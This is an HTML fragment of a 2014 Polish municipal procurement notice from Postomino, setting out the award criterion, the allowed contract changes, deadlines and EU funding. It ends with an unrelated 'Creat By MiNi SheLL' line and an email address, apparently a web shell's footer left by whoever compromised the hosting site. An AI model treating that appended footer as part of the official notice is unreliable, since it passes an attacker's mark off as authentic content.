<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1) Zmiana terminu realizacji przedmiotu umowy:
a) w przypadku przedłużających się procedur związanych z wykorzystaniem przez wykonawców środków ochrony prawnej w zamówieniach publicznych lub innych procedur zamówień publicznych,
b) spowodowana warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, dokonywanie odbiorów,
c) spowodowana udzieleniem zamówień zamiennych lub dodatkowych,
d) koniecznością wprowadzenia zmian w dokumentacji projektowej/technicznej będącej załącznikiem do SIWZ, 
e) spowodowana nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności w przypadku:
- odmiennych od przyjętych w dokumentacji technicznej warunków geologicznych,
- odmiennych od przyjętych w dokumentacji technicznej warunków terenowych, 
- istnienia niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych, podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych
f) w przypadku zmian sposobu spełnienia świadczenia opisanych w punkcie 2,
g) w innych uzasadnionych przypadkach;
2) Zmiany sposobu spełnienia świadczenia:
a) zmiany technologiczne, w szczególności: konieczność zrealizowania przedmiotu zmówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w SIWZ w szczególności w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia;
b) konieczność usunięcia wad i braków lub wprowadzenia zmian w dokumentacji projektowej/technicznej będącej załącznikiem do SIWZ,
c) spowodowane odmiennymi od przyjętych w dokumentacji warunkami terenowymi, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
3) Zlecenie realizacji robót zamiennych lub dodatkowych,
4) Zmiana wynagrodzenia Wykonawcy spowodowana w szczególności:
a) zmianami przepisów prawnych, w tym zmiany stawki od podatku od towarów 
i usług mającej zastosowanie do przedmiotu umowy,
b) wprowadzeniem zmian sposobu świadczenia opisanych w pkt 2.
c) wyłączeniem spod ryczałtu robót zamiennych i rozliczenia ich kosztorysem powykonawczym lub różnicowym, 
5) Zamawiający przewiduje możliwość wyłączenia spod ryczałtu robót zamiennych 
i rozliczenia ich kosztorysem powykonawczym lub różnicowym, 
6) Zamawiający przewiduje zmniejszenie wynagrodzenia o wartość robót niewykonanych, a ujętych w oferowanej cenie na podstawie kosztorysu powykonawczego lub różnicowego w oparciu o dokonane obmiary faktycznie wykonanych ilości robót Zamawiający przewiduje zmniejszenie wynagrodzenia z tytułu wad w przedmiocie umowy uniemożliwiających użytkowanie przedmiotu umowy. 
7) Zamawiający przewiduje obniżenie wynagrodzenia z tytułu nieuregulowania przez Wykonawcę kosztów zużycia wody i energii,  
8) Zamawiający przewiduje możliwość zmian w zakresie wymagań dotyczących umów o podwykonawstwo.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.postomino.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Postomino, Postomino 30, 76-113 Postomino, pok. nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2014 godzina 10:00, miejsce: Urząd Gminy Postomino, Postomino 30, 76-113 Postomino, pok. nr 19 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com